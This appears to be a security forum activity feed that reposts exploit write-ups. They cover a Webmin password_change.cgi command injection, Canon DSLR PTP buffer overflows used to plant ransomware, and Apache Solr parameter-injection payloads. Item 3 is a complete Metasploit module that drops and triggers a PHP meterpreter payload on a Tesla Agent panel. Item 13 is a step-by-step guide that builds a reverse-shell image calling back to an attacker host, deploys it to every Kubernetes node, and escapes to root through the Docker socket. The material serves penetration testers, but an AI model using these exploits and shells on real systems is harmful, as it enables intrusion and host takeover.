Jump to content

All Activity

This stream auto-updates     

  1. Today
  2. Today’s exploit of the day is one affecting the popular system administrator tool Webmin that is know to run on port 10000. A bug has been found in the reset password function that allows a malicious third party to execute malicious code due to lack of input validation. Affecting: Webmin up to the latest version 1.920 instances which has the setting “user password change enabled” The vulnerability has been given the CVE CVE-2019-15107 as the time of writing this(2019-08-16) the vulnerability still exists in the latest version you can download from webmin’s official site. Vulnerable code in version 1.920 computer@box:/tmp/webmin-1.920$ cat -n password_change.cgi | head -n 176 | tail -29 148 149 # Read shadow file and find user 150 &lock_file($miniserv{'passwd_file'}); 151 $lref = &read_file_lines($miniserv{'passwd_file'}); 152 for($i=0; $i<@$lref; $i++) { 153 @line = split(/:/, $lref->[$i], -1); 154 local $u = $line[$miniserv{'passwd_uindex'}]; 155 if ($u eq $in{'user'}) { 156 $idx = $i; 157 last; 158 } 159 } 160 defined($idx) || &pass_error($text{'password_euser'}); 161 162 # Validate old password 163 &unix_crypt($in{'old'}, $line[$miniserv{'passwd_pindex'}]) eq 164 $line[$miniserv{'passwd_pindex'}] || 165 &pass_error($text{'password_eold'}); 166 167 # Make sure new password meets restrictions 168 if (&foreign_check("changepass")) { 169 &foreign_require("changepass", "changepass-lib.pl"); 170 $err = &changepass::check_password($in{'new1'}, $in{'user'}); 171 &pass_error($err) if ($err); 172 } 173 elsif (&foreign_check("useradmin")) { 174 &foreign_require("useradmin", "user-lib.pl"); 175 $err = &useradmin::check_password_restrictions( 176 $in{'new1'}, $in{'user'}); Proof of concept The vulnerability laws in the &unix_crypt crypt function that checks the passwd against the systems /etc/shadow file By adding a simple pipe command (“|”) the author is able to exploit this to execute what ever code he wants. The pipe command is like saying and in the context of “execute this command and this” here does the author prove that this is exploitable very easy with just a simple POST request. Webmin has not had a public statement or patch being announced yet meaning everyone who is running webmin is running a vulnerable version and should take it offline until further notice. It is still very unclear on how many public instances of webmin are public on the internet a quick search on shodan finds a bit over 13 0000. External links: Webmin on wikipedia Webmin in nmap Authors blog post Archived link of the authors blog post Nist CVE Shodan Stay up to date with Vulnerability Management and build cool things with our API This blog post is part of the exploit of the day series where we write a shorter description about interesting exploits that we index. Reference Link : https://blog.firosolutions.com/exploits/webmin/?fbclid=IwAR06hKE7owE6af5dXmBaN-o5wioKPeY609QQkXaRwEHRxBMfoCUDaNHq7FY Download Link :https://www.exploit-db.com/exploits/47230 Download Link 2 .: https://www.exploit-db.com/exploits/47293
  3. class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info={}) super(update_info(info, 'Name' => "Tesla Agent Remote Code Execution", 'Description' => %q{ This module exploits the command injection vulnerability of tesla agent botnet panel. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ege Balcı <ege.balci@invictuseurope.com>' # author & msf module ], 'References' => [ ['URL', 'https://prodaft.com'] ], 'DefaultOptions' => { 'SSL' => false, 'WfsDelay' => 5, }, 'Platform' => ['php'], 'Arch' => [ ARCH_PHP ], 'Targets' => [ ['PHP payload', { 'Platform' => 'PHP', 'Arch' => ARCH_PHP, 'DefaultOptions' => {'PAYLOAD' => 'php/meterpreter/bind_tcp'} } ] ], 'Privileged' => false, 'DisclosureDate' => "July 10 2018", 'DefaultTarget' => 0 )) register_options( [ OptString.new('TARGETURI', [true, 'The URI of the tesla agent with panel path', '/WebPanel/']), ] ) end def check res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path, '/server_side/scripts/server_processing.php'), ) #print_status(res.body) if res && res.body.include?('SQLSTATE') Exploit::CheckCode::Appears else Exploit::CheckCode::Safe end end def exploit check name = '.'+Rex::Text.rand_text_alpha(4)+'.php' res = send_request_cgi( 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/server_processing.php'), 'encode_params' => true, 'vars_get' => { 'table' => 'passwords', 'primary' => 'password_id', 'clmns' => 'a:1:{i:0;a:3:{s:2:"db";s:3:"pwd";s:2:"dt";s:8:"username";s:9:"formatter";s:4:"exec";}}', 'where' => Rex::Text.encode_base64("1=1 UNION SELECT \"echo #{Rex::Text.encode_base64(payload.encoded)} | base64 -d > #{name}\"") } ) if res && res.code == 200 && res.body.include?('recordsTotal') print_good("Payload uploaded as #{name}") else print_error('Payload upload failed :(') Msf::Exploit::Failed end res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path,'/server_side/scripts/',name)}, 5 ) if res && res.code == 200 print_good("Payload successfully triggered !") else print_error('Payload trigger failed :(') Msf::Exploit::Failed end end end Download Link https://www.exploit-db.com/exploits/47256
  4. Mai doreste cineva invitatie?
  5. Doar acest cont il ai sau ai mai multe?
  6. Oamenii acestia nu au "gandit in afara cutiei", ci "in afara sistemului solar"...
  7. Synopsis: A simple misconfiguration can lead to Stored XSS. Link: https://medium.com/@nahoragg/chaining-cache-poisoning-to-stored-xss-b910076bda4f
  8. Yesterday
  9. Synopsis: In external and red team engagements, we often come across different forms of IP based blocking. This prevents things like password brute forcing, password spraying, API rate limiting, and other forms of IP blocking like web application firewalls (WAFs). IP blocking has always been a simple and common way of blocking potentially malicious traffic to a website. The general method of IP based blocking is to monitor for a certain type of request or behavior, and when it is found, disable access for the IP that the request or behavior came from. In this post, we walk through the need for and creation of a Burp Suite extension that we built in order to easily circumvent IP blocking. Source: https://rhinosecuritylabs.com/aws/bypassing-ip-based-blocking-aws/
  10. BiosHell

    butthax

    the real "penetration testing"
  11. Every Security Team is a Software Team Now by Dino Dai Zovi As software is eating the world, every company is becoming a software company. This doesn’t mean that every company is shipping software products, it means that services and products in every field are becoming increasingly driven, powered, and differentiated by software. Let’s explore what that will do to how cybersecurity is practiced in enterprises of all types. Peter Drucker famously said that “Culture eats strategy for breakfast.” There have been two large cultural shifts in software engineering over the last 20 years that created the successful strategies behind how software is eating the world. First, there was Agile (2001). In response to the inefficiencies of classic “waterfall” software development, Agile focused on breaking down the barriers between software requirements, development, and testing by having software development teams own their roadmaps as well as their quality. Separate product management organizations evolved into product owners working directly with the software team. Similarly, separate quality assurance organizations evolved into a focus on building quality into the software development process. This should remind us of how we talk about needing to build security in, but most importantly, this change was effected by software teams themselves vs. forced onto them by a separate security organization. There is a lesson to be learned there. Next came DevOps (2009), which brought the agile mindset to server operations. Software teams now began to own their deployment and their uptime. Treating software teams as the end-user and customer has driven the replacement of traditional ops with the cloud and replacing the traditional stack with serverless models. Ops teams evolved into software teams that provide platforms, tools, and self-service infrastructure to internal teams. They provide value by increasing internal teams’ productivity while reducing costs to the entire organization through economies of scale and other efficiencies. When a cross-functional team owns their features, their quality, their deployment, and their uptime, they fully own their end-to-end value stream. Next, they will evolve to also own their own risks and fully own their end-to-end impact. There are two big shifts involved as teams begin to own their end-to-end impact: software teams need to own their own security now and security teams need to become full-stack software teams. Just as separate product management and quality assurance organizations diffused into cross-functional software teams, security must now do the same. At his re:Invent 2018 Keynote, Amazon’s CTO Werner Vogels proclaimed that “security is everyone’s job now, not just the security team’s.” But if security is every teams’ job, what is the security team’s job? Just like how classic ops teams became internal infrastructure software teams, security teams will become internal security software teams that deliver value to internal teams through self-service platforms and tools. Security teams that adopt this approach will reduce the risk to the organization the most while also minimizing impact to overall productivity. In this talk, we’ll explore how this is already being done across high-performing companies and how to foster this security transformation at yours.
  12. Say Cheese: Ransomware-ing a DSLR Camera August 11, 2019 Research by: Eyal Itkin TL;DR Cameras. We take them to every important life event, we bring them on our vacations, and we store them in a protective case to keep them safe during transit. Cameras are more than just a tool or toy; we entrust them with our very memories, and so they are very important to us. In this blog, we recount how we at Check Point Research went on a journey to test if hackers could hit us in this exact sweet spot. We asked: Could hackers take over our cameras, the guardians of our precious moments, and infect them with ransomware? And the answer is: Yes. Background: DSLR cameras aren’t your grandparents’ cameras, those enormous antique film contraptions you might find up in the attic. Today’s cameras are embedded digital devices that connect to our computers using USB, and the newest models even support WiFi. While USB and WiFi are used to import our pictures from the camera to our mobile phone or PC, they also expose our camera to its surrounding environment. Our research shows how an attacker in close proximity (WiFi), or an attacker who already hijacked our PC (USB), can also propagate to and infect our beloved cameras with malware. Imagine how would you respond if attackers inject ransomware into both your computer and the camera, causing them to hold all of your pictures hostage unless you pay ransom. Below is a Video Demonstration of this attack: Technical Details Picture Transfer Protocol (PTP) Modern DSLR cameras no longer use film to capture and later reproduce images. Instead, the International Imaging Industry Association devised a standardised protocol to transfer digital images from your camera to your computer. This protocol is called the Picture Transfer Protocol (PTP). Initially focused on image transfer, this protocol now contains dozens of different commands that support anything from taking a live picture to upgrading the camera’s firmware. Although most users connect their camera to their PC using a USB cable, newer camera models now support WiFi. This means that what was once a PTP/USB protocol that was accessible only to the USB connected devices, is now also PTP/IP that is accessible to every WiFi-enabled device in close proximity. In a previous talk named “Paparazzi over IP” (HITB 2013), Daniel Mende (ERNW) demonstrated all of the different network attacks that are possible for each network protocol that Canon’s EOS cameras supported at the time. At the end of his talk, Daniel discussed the PTP/IP network protocol, showing that an attacker could communicate with the camera by sniffing a specific GUID from the network, a GUID that was generated when the target’s computer got paired with the camera. As the PTP protocol offers a variety of commands, and is not authenticated or encrypted in any way, he demonstrated how he (mis)used the protocol’s functionality for spying over a victim. In our research we aim to advance beyond the point of accessing and using the protocol’s functionality. Simulating attackers, we want to find implementation vulnerabilities in the protocol, hoping to leverage them in order to take over the camera. Such a Remote Code Execution (RCE) scenario will allow attackers to do whatever they want with the camera, and infecting it with Ransomware is only one of many options. From an attacker’s perspective, the PTP layer looks like a great target: PTP is an unauthenticated protocol that supports dozens of different complex commands. Vulnerability in PTP can be equally exploited over USB and over WiFi. The WiFi support makes our cameras more accessible to nearby attackers. In this blog, we focus on the PTP as our attack vector, describing two potential avenues for attackers: USB – For an attacker that took over your PC, and now wants to propagate into your camera. WiFi – An attacker can place a rogue WiFi access point at a tourist attraction, to infect your camera. In both cases, the attackers are going after your camera. If they’re successful, the chances are you’ll have to pay ransom to free up your beloved camera and picture files. Introducing our target We chose to focus on Canon’s EOS 80D DSLR camera for multiple reasons, including: Canon is the largest DSLR maker, controlling more than 50% of the market. The EOS 80D supports both USB and WiFi. Canon has an extensive “modding” community, called Magic Lantern. Magic Lantern (ML) is an open-source free software add-on that adds new features to the Canon EOS cameras. As a result, the ML community already studied parts of the firmware, and documented some of its APIs. Attackers are profit-maximisers, they strive to get the maximum impact (profit) with minimal effort (cost). In this case, research on Canon cameras will have the highest impact for users, and will be the easiest to start, thanks to the existing documentation created by the ML community. Obtaining the firmware This is often the trickiest part of every embedded research. The first step is to check if there is a publicly available firmware update file in the vendor’s website. As expected, we found it after a short Google search. After downloading the file and extracting the archive, we had an unpleasant surprise. The file appears to be encrypted / compressed, as can be seen in Figure 1. Figure 1 – Byte histogram of the firmware update file. The even byte distribution hints that the firmware is encrypted or compressed, and that whatever algorithm was used was probably a good one. Skimming through the file, we failed to find any useful pattern that could potentially be a hint of the existence of the assembly code for a bootloader. In many cases, the bootloader is uncompressed, and it contains the instructions needed for the decryption / decompression of the file. Trying several decompression tools, such as Binwalk or 7Zip, produced no results, meaning that this is a proprietary compression scheme, or even an encryption. Encrypted firmware files are quite rare, due to the added costs of key management implications for the vendor. Feeling stuck, we went back to Google, and checked what the internet has to say about this .FIR file. Here we can see the major benefit of studying a device with an extensive modding community, as ML also had to work around this limitation. And indeed, in their wiki, we found this page that describes the “update protection” of the firmware update files, as deployed in multiple versions over the years. Unfortunately for us, this confirms our initial guess: the firmware is AES encrypted. Being open-source, we hoped that ML would somehow publish this encryption key, allowing us to decrypt the firmware on our own. Unfortunately, that turned out not to be the case. Not only does ML intentionally keep the encryption key secret, we couldn’t even find the key anywhere in the internet. Yet another dead end. The next thing to check was if ML ported their software to our camera model, on the chance it contains debugging functionality that will help us dump the firmware. Although such a port has yet to be released, while reading through their forums and Wiki, we did find a breakthrough. ML developed something called Portable ROM Dumper. This is a custom firmware update file that once loaded, dumps the memory of the camera into the SD Card. Figure 2 shows a picture of the camera during a ROM dump. Figure 2 – Image taken during a ROM Dump of the EOS 80D. Using the instructions supplied in the forum, we successfully dumped the camera’s firmware and loaded it into our disassembler (IDA Pro). Now we can finally start looking for vulnerabilities in the camera. Reversing the PTP layer Finding the PTP layer was quite easy, due to the combination of two useful resources: The PTP layer is command-based, and every command has a unique numeric opcode. The firmware contains many indicative strings, which eases the task of reverse-engineering it. Figure 3 – PTP-related string from the firmware. Traversing back from the PTP OpenSession handler, we found the main function that registers all of the PTP handlers according to their opcodes. A quick check assured us that the strings in the firmware match the documentation we found online. When looking on the registration function, we realized that the PTP layer is a promising attack surface. The function registers 148 different handlers, pointing to the fact that the vendor supports many proprietary commands. With almost 150 different commands implemented, the odds of finding a critical vulnerability in one of them is very high. PTP Handler API Each PTP command handler implements the same code API. The API makes use of the ptp_context object, an object that is partially documented thanks to ML. Figure 4 shows an example use case of the ptp_context: Figure 4 – Decompiled PTP handler, using the ptp_context object. As we can see, the context contains function pointers that are used for: Querying about the size of the incoming message. Receiving the incoming message. Sending back the response after handling the message. It turns out that most of the commands are relatively simple. They receive only a few numeric arguments, as the protocol supports up to 5 such arguments for every command. After scanning all of the supported commands, the list of 148 commands was quickly narrowed down to 38 commands that receive an input buffer. From an attacker’s viewpoint, we have full control of this input buffer, and therefore, we can start looking for vulnerabilities in this much smaller set of commands. Luckily for us, the parsing code for each command uses plain C code and is quite straight-forward to analyze. Soon enough, we found our first vulnerability. CVE-2019-5994 – Buffer Overflow in SendObjectInfo – 0x100C PTP Command Name: SendObjectInfo PTP Command Opcode: 0x100c Internally, the protocol refers to supported files and images as “Objects”, and in this command the user updates the metadata of a given object. The handler contains a Buffer Overflow vulnerability when parsing what was supposed to be the Unicode filename of the object. Figure 5 shows a simplified code version of the vulnerable piece of code: Figure 5 – Vulnerable code snippet from the SendObjectInfo handler. This is a Buffer Overflow inside a main global context. Without reversing the different fields in this context, the only direct implication we have is the Free-Where primitive that is located right after our copy. Our copy can modify the pKeywordsStringUnicode field into an arbitrary value, and later trigger a call to free it. This looks like a good way to start our research, but we continued looking for a vulnerability that is easier to exploit. CVE-2019-5998 – Buffer Overflow in NotifyBtStatus – 0x91F9 PTP Command Name: NotifyBtStatus PTP Command Opcode: 0x91F9 Even though our camera model doesn’t support Bluetooth, some Bluetooth-related commands were apparently left behind, and are still accessible to attackers. In this case, we found a classic Stack-Based Buffer Overflow, as can be seen in Figure 6. Figure 6 – Vulnerable code snippet from the NotifyBtStatus handler. Exploiting this vulnerability will be easy, making it our prime target for exploitation. We would usually stop the code audit at this point, but as we are pretty close to the end of the handler’s list, let’s finish going over the rest. CVE-2019-5999– Buffer Overflow in BLERequest – 0x914C PTP Command Name: BLERequest PTP Command Opcode: 0x914C It looks like the Bluetooth commands are more vulnerable than the others, which may suggest a less experienced development team. This time we found a Heap-Based Buffer Overflow, as can be seen in Figure 7. Figure 7 – Vulnerable code snippet from the BLERequest handler. We now have 3 similar vulnerabilities: Buffer Overflow over a global structure. Buffer Overflow over the stack. Buffer Overflow over the heap. As mentioned previously, we will attempt to exploit the Stack-Based vulnerability, which will hopefully be the easiest. Gaining Code Execution We started by connecting the camera to our computer using a USB cable. We previously used the USB interface together with Canon’s “EOS Utility” software, and it seems natural to attempt to exploit it first over the USB transport layer. Searching for a PTP Python library, we found ptpy, which didn’t work straight out of the box, but still saved us important time in our setup. Before writing a code execution exploit, we started with a small Proof-of-Concept (PoC) that will trigger each of the vulnerabilities we found, hopefully ending in the camera crashing. Figure 8 shows how the camera crashes, in what is described by the vendor as “Err 70.” Figure 8 – Crash screen we received when we tested our exploit PoCs. Now that we are sure that all of our vulnerabilities indeed work, it’s time to start the real exploit development. Basic recap of our tools thus far: Our camera has no debugger or ML on it. The camera wasn’t opened yet, meaning we don’t have any hardware-based debugging interface. We don’t know anything about the address space of the firmware, except the code addresses we see in our disassembler. The bottom line is that we are connected to the camera using a USB cable, and we want to blindly exploit a Stack-Based buffer overflow. Let’s get started. Our plan is to use the Sleep() function as a breakpoint, and test if we can see the device crash after a given number of seconds. This will confirm that we took over the execution flow and triggered the call to Sleep(). This all sounds good on paper, but the camera had other plans. Most of the time, the vulnerable task simply died without triggering a crash, thus causing the camera to hang. Needless to say, we can’t differentiate between a hang, and a sleep and then hang, making our breakpoint strategy quite pointless. Originally, we wanted a way to know that the execution flow reached our controlled code. We therefore decided to flip our strategy. We found a code address that always triggers an Err 70 when reached. From now on, our breakpoint will be a call to that address. A crash means we hit our breakpoint, and “nothing”, a hang, means we didn’t reach it. We gradually constructed our exploit until eventually we were able to execute our own assembly snippet – we now have code execution. Loading Scout Scout is my goto debugger. It is an instruction-based debugger that I developed during the FAX research, and that proved itself useful in this research as well. However, we usually use the basic TCP loader for Scout, which requires network connectivity. While we can use a file loader that will load Scout from the SD Card, we will later need the same network connectivity for Scout, so we might as well solve this issue now for them both. After playing with the different settings in the camera, we realized that the WiFi can’t be used while the USB is connected, most likely because they are both meant to be used by the PTP layer, and there is no support for using them both at the same time. So we decided the time had come to move on from the USB to WiFi. We can’t say that switching to the WiFi interface worked out of the box, but eventually we had a Python script that was able to send the same exploit script, this time over the air. Unfortunately, our script broke. After intensive examination, our best guess is that the camera crashes before we return back from the vulnerable function, effectively blocking the Stack-Based vulnerability. While we have no idea why it crashes, it seems that sending a notification about the Bluetooth status, when connecting over WiFi, simply confuses the camera. Especially when it doesn’t even support Bluetooth. We went back to the drawing-board. We could try to exploit one of the other two vulnerabilities. However, one of them is also in the Bluetooth module, and it doesn’t look promising. Instead, we went over the list of the PTP command handlers again, and this time looked at each one more thoroughly. To our great relief, we found some more vulnerabilities. CVE-2019-6000– Buffer Overflow in SendHostInfo – 0x91E4 PTP Command Name: SendHostInfo PTP Command Opcode: 0x91E4 Looking at the vulnerable code, as seen in Figure 9, it was quite obvious why we missed the vulnerability at first glance. Figure 9 – Vulnerable code snippet from the SendHostInfo handler. This time the developers remembered to check that the message is the intended fixed size of 100 bytes. However, they forgot something crucial. Illegal packets will only be logged, but not dropped. After a quick check in our WiFi testing environment, we did see a crash. The logging function isn’t an assert, and it won’t stop our Stack-Based buffer overflow 😊 Although this vulnerability is exactly what we were looking for, we once again decided to keep on looking for more, especially as this kind of vulnerability will most likely be found in more than a single command. CVE-2019-6001– Buffer Overflow in SetAdapterBatteryReport – 0x91FD PTP Command Name: SendAdapterBatteryReport PTP Command Opcode: 0x91FD Not only did we find another vulnerability with the same code pattern, this was the last command in the list, giving us a nice finish. Figure 10 shows a simplified version of the vulnerable PTP handler. Figure 10 – Vulnerable code snippet from the SendAdapterBatteryReport handler. In this case, the stack buffer is rather small, so we will continue using the previous vulnerability. Side Note: When testing this vulnerability in the WiFi setup, we found that it also crashes before the function returns. We were only able to exploit it over the USB connection. Loading Scout – Second Attempt Armed with our new vulnerability, we finished our exploit and successfully loaded Scout on the camera. We now have a network debugger, and we can start dumping memory addresses to help us during our reverse engineering process. But, wait a minute, aren’t we done? Our goal was to show that the camera could be hijacked from both USB and WiFi using the Picture Transfer Protocol. While there were minor differences between the two transport layers, in the end the vulnerability we used worked in both cases, thus proving our point. However, taking over the camera was only the first step in the scenario we presented. Now it’s time to create some ransomware. Time for some Crypto Any proper ransomware needs cryptographic functions for encrypting the files that are stored on the device. If you recall, the firmware update process mentioned something about AES encryption. This looks like a good opportunity to finish all of our tasks in one go. This reverse engineering task went much better that we thought it would; not only did we find the AES functions, we also found the verification and decryption keys for the firmware update process. Because AES is a symmetric cipher, the same keys can also be used for encrypting back a malicious firmware update and then signing it so it will pass the verification checks. Instead of implementing all of the complicated cryptographic algorithms ourselves, we used Scout. We implemented a new instruction that simulates a firmware update process, and sends back the cryptographic signatures that the algorithm calculated. Using this instruction, we now know what are the correct signatures for each part in the firmware update file, effectively gaining a signing primitive by the camera itself. Since we only have one camera, this was a tricky part. We want to test our own custom home-made firmware update file, but we don’t want to brick our camera. Luckily for us, in Figure 11 you can see our custom ROM Dumper, created by patching Magic Lantern’s ROM Dumper. Figure 11 – Image of our customized ROM Dumper, using our header. CVE-2019-5995 – Silent malicious firmware update: There is a PTP command for remote firmware update, which requires zero user interaction. This means that even if all of the implementation vulnerabilities are patched, an attacker can still infect the camera using a malicious firmware update file. Wrapping it up After playing around with the firmware update process, we went back to finish our ransomware. The ransomware uses the same cryptographic functions as the firmware update process, and calls the same AES functions in the firmware. After encrypting all of the files on the SD Card, the ransomware displays the ransom message to the user. Chaining everything together requires the attacker to first set-up a rogue WiFi Access Point. This can be easily achieved by first sniffing the network and then faking the AP to have the same name as the one the camera automatically attempts to connect. Once the attacker is within the same LAN as the camera, he can initiate the exploit. Here is a video presentation of our exploit and ransomware. Disclosure Timeline 31 March 2019 – Vulnerabilities were reported to Canon. 14 May 2019 – Canon confirmed all of our vulnerabilities. From this point onward, both parties worked together to patch the vulnerabilities. 08 July 2019 – We verified and approved Canon’s patch. 06 August 2019 – Canon published the patch as part of an official security advisory. Canon’s Security Advisory Here are the links to the official security advisory that was published by Canon: Japanese: https://global.canon/ja/support/security/d-camera.html English: https://global.canon/en/support/security/d-camera.html We strongly recommend everyone to patch their affected cameras. Conclusion During our research we found multiple critical vulnerabilities in the Picture Transfer Protocol as implemented by Canon. Although the tested implementation contains many proprietary commands, the protocol is standardized, and is embedded in other cameras. Based on our results, we believe that similar vulnerabilities can be found in the PTP implementations of other vendors as well. Our research shows that any “smart” device, in our case a DSLR camera, is susceptible to attacks. The combination of price, sensitive contents, and wide-spread consumer audience makes cameras a lucrative target for attackers. A final note about the firmware encryption. Using Magic Lantern’s ROM Dumper, and later using the functions from the firmware itself, we were able to bypass both the encryption and verification. This is a classic example that obscurity does not equal security, especially when it took only a small amount of time to bypass these cryptographic layers. Sursa: https://research.checkpoint.com/say-cheese-ransomware-ing-a-dslr-camera/
  13. Making it Rain shells in Kubernetes August 10th, 2019 Following on from the last post in this series lets setup a rather more ambitious set of reverse shells when attacking a Kubernetes cluster. The scenario here is that we’ve got the ability to create a daemonset object in a target Kubernetes cluster and we’d like to have shells on every node in the cluster which have the Docker socket exposed, so we can get a root shell on every node in the cluster. To do this we’ll need something that’ll easily handle multiple incoming shells, so we’ll turn to the Metasploit Framework and specifically, exploit/multi/handler Step 1: Create the payload We need a Docker image that we can deploy to the cluster which will have our payload to connect back to the listener that we’re going to setup and will run on each node in the cluster. For this we can run msfvenom to setup our payload and then embed that into a Docker image. In this case our pentester machine will be on 192.168.200.1 . To avoid managing all Metasploit’s dependencies we can just run it in a Docker container. This command will generate our payload docker run raesene/metasploit ./msfvenom -p linux/x64/meterpreter_reverse_http LHOST=192.168.200.1 LPORT=8989 -f elf > reverse_shell.elf Setting up the Docker Image Next run this command to get the Docker GPG key into your directory curl https://download.docker.com/linux/ubuntu/gpg > docker.gpg We can now create a Dockerfile to host this shell and upload it to Docker hub. The Dockerfile is a pretty simple one, we’ll need out payload and also the Docker client, for later use. FROM ubuntu:18.04 RUN apt update && apt install -y apt-transport-https ca-certificates curl software-properties-common COPY docker.gpg /docker.gpg RUN apt-key add /docker.gpg RUN add-apt-repository \ "deb [arch=amd64] https://download.docker.com/linux/ubuntu \ $(lsb_release -cs) \ stable" RUN apt-get install -y docker-ce-cli COPY reverse_shell.elf /reverse_shell.elf RUN chmod +x /reverse_shell.elf CMD ["/reverse_shell.elf"] Build it with (replace raesene below with your own docker hub name) docker build -t raesene/reverse_shell . Then you can login to Docker hub with docker login and upload with docker push raesene/reverse_shell At this point we can test our reverse shell on a single machine by setting up a Metasploit listener and check that all is well. Step 2: Setting up Metasploit to receive our shells On the pentester machine start-up the metasploit console with msfconsole then use exploit/multi/handler and set our variables, in the same way we did with msfvenom earlier set payload linux/x64/meterpreter_reverse_http set LHOST 192.168.200.1 set LPORT 8989 set ExitOnSession false With those set, we can start it up to listen for incoming shells exploit -j Now on a target machine run our shell and we should get that back on the metasploit console docker run raesene/reverse_shell Assuming that’s all working we’re ready to scale it up to our Kubernetes cluster Step 3: Using a Daemonset to compromise a cluster So we want a workload which will run on every node in the cluster, and that’s exactly what a daemonset will do for us. We’ll need a manifest that creates our daemonset and also we want it to expose the Docker socket so we can easily break out of each of our containers to the underlying host. This should work fine, unless the cluster has a PodSecurityPolicy blocking the mounting of the docker socket inside a container. We’ll call our manifest reverse-shell-daemonset.yml and it should contain this :- apiVersion: apps/v1 kind: DaemonSet metadata: name: reverse-shell-daemonset labels: spec: selector: matchLabels: name: reverse-shell-daemonset template: metadata: labels: name: reverse-shell-daemonset spec: tolerations: - key: node-role.kubernetes.io/master effect: NoSchedule containers: - name: revshell image: raesene/reverse-shell volumeMounts: - mountPath: /var/run/docker.sock name: dockersock volumes: - name: dockersock hostPath: path: /var/run/docker.sock Once you’ve got your manifest ready, just apply it to the cluster with kubectl create -f reverse-shell-daemonset.yml Back on your metasploit console you should see your shells pop in, one for each node Getting to root on the nodes So once you’ve got your shells working, you can interact with them from the Metasploit console sessions -l Will show you your active sessions. Then sessions -i 1 Will let you interact with one of them shell should give you a shell inside the container running on one of our nodes. Now the last part is to use the exposed Docker Socket to get a root shell on the underlying host. To Do this we can juse make use of the every handy Most Pointless Docker Command Ever Running docker run -ti --privileged --net=host --pid=host --ipc=host --volume /:/host busybox chroot /host and it’ll dump us out to a root shell on the underlying node raesene Security Geek, Penetration Testing, Docker, Ruby, Hillwalking Sursa: https://raesene.github.io/blog/2019/08/10/making-it-rain-shells-in-Kubernetes/
  14. Apache Solr Injection Research Table of Contents Introduction Solr API quick overview Apache Solr Injection Solr Parameters Injection (HTTP smuggling) Exploitation examples Solr Local Parameters Injection Ways to RCE [CVE-2017-12629] Remote Code Execution via RunExecutableListener [CVE-2019-0192] Deserialization of untrusted data via jmx.serviceUrl Attack via deserialization Attack via direct access to JMX [CVE-2019-0193] Remote Code Execution via dataImportHandler [CVE-2012-6612, CVE-2013-6407, CVE-2013-6408] XXE in the Update Handler [CVE-2013-6397] Remote Code execution via XSLT response writer and path traversal [CVE-2017-3163] Arbitrary file read via path traversal attack in ReplicationHandler Black box detection Conclusion Introduction This research is aimed to present a new vulnerability: "Solr parameter Injection" and describe how it may be exploited in different scenarios. It also accumulates all public exploits for Apache Solr. Apache Solr is an open source enterprise search platform, written in Java, from the Apache Lucene project. Its major features include full-text search, hit highlighting, faceted search, dynamic clustering, and document parsing. You may threat it like a database: you run the server, create a collection, and send different types of data to it (such as text, xml documents, pdf documents, pretty any format). Solr automatically index this data and provide a fast but rich REST API interface to search over it. The only protocol to talk to server is HTTP and yes, it's accessible without authentication by default, which makes it a perfect victim for SSRF, CSRF and HTTP Request Smuggling attacks. Solr API quick overview When you start a Solr instance (e.g. by using "./bin/solr start -e dih" command) it creates a web server on port 8983: The default example comes with some data inside, so we can immediately search in it. This is a simple query that search for "Apple" keyword in all documents and returns the result in JSON format: A more complex query may look like this: The main parameters here are: /solr/db/select - "db" is the collection name, "/select" means we would like to perform a search operation handled by the SearchHandler q={!dismax+df=name}Apple - This query searches for the "name" field containing the "Apple" keyword, using the "dismax" query parser. The data between braces is parsed as Solr local parameters fl=*,score,similar:[subquery] - "fl" stands for field list to be returned, the [subquery] transformer allows to include data from another search query to the resulted document. In our case the subquery searches for the "computer" keyword. Apart from the search, there is a possibility to perform update operation, view and modify the config, or even perform a replication. If we have access to the Solr Web Interface, we can upload and modify any data and do almost any operation. By default, there is no users or roles, which makes it a perfect target for SSRF, CSRF and HTTP Request Smuggling attacks. Apache Solr Injection Like a database, in most cases, the Solr Rest API is not directly accessible to end users and used only internally by other applications. In these cases, we would like to introduce a couple of new attack against web applications that use Solr. Solr Parameters Injection (HTTP smuggling) If a target web application uses untrusted user input when making HTTP API calls to Solr, it potentially does not properly encode the data with URL Encoding. Here is a simple java web application that accepts just one "q" parameter and performs a search operation by making a server-to-server HTTP request to Solr: @RequestMapping("/search") @Example(uri = "/search?q=Apple") public Object search1(@RequestParam String q) { //search the supplied keyword inside solr String solr = "http://solrserver/solr/db/"; String query = "/select?q=" + q + "&fl=id,name&rows=10"; return http.get(solr + query); } Since there is no URL encoding applied to this parameter, by sending payloads such as 'q=123%26param1=xxx%26param2=yyy' it is possible to inject additional HTTP query parameters to the Solr search request and change the logic how request is processed. The '%26' character here is the encoded version of the '&' character, which is a parameter delimiter in the HTTP query. A normal request from a user to the web app: GET /search?q=Apple Leads to the following request from the web app to the Solr server: GET /solr/db/select?q=Apple A malicious request from a user to the web app: GET /search?q=Apple%26xxx=yyy Leads to the following request from the web app to the Solr server: GET /solr/db/select?q=Apple&xxx=yyy As you can see here, due to the parameter injection vulnerability, the 'q' parameter is decoded by the web app, but not properly encoded in the request to Solr server. So, the main question is what we can do with it? Considering the request will be sent to the '/select' anyway, what parameters we can send to do something malicious on the Sorl side? Well, Solr supports a lot of different query parameters, but for exploitation the most interesting are: shards=http://127.0.0.1:8983/ - by specifying the shards parameter we can make the target Solr server to act as a reverse-proxy, sending this request to another or our own malicious Solr node. It allows attackers to feed arbitrary data to the Solr server, or even reach the firewall protected Admin api. *N.B. Restricted in 7.7.1+ qt=/update - allows to rewrite the handler for the request (from /select to /update or any other). Although the vulnerable application will always send the request to '/solr/db/select' it may create a false developers feeling that this request will be processed as a search request. In fact, by using 'qt' and 'shards' parameters we can reach '/update' or '/config' Solr endpoints. shards.qt=/update - also allows to rewrite the request handler stream.body=xxx - allows to rewrite the full request body. Disabled in the latest versions, but usable if we target outdated Solr. If we can 'smuggle' these parameters to the Solr query, it could be a serious vulnerability that may lead to data modification inside the Solr instance and even RCE in some cases. Exploitation examples The exploit request to change Solr config properties may look like: GET /search?q=Apple&shards=http://127.0.0.1:8983/solr/collection/config%23&stream.body={"set-property":{"xxx":"yyy"}} To query data from another collection GET /solr/db/select?q=orange&shards=http://127.0.0.1:8983/solr/atom&qt=/select?fl=id,name:author&wt=json To update data in another collection: GET 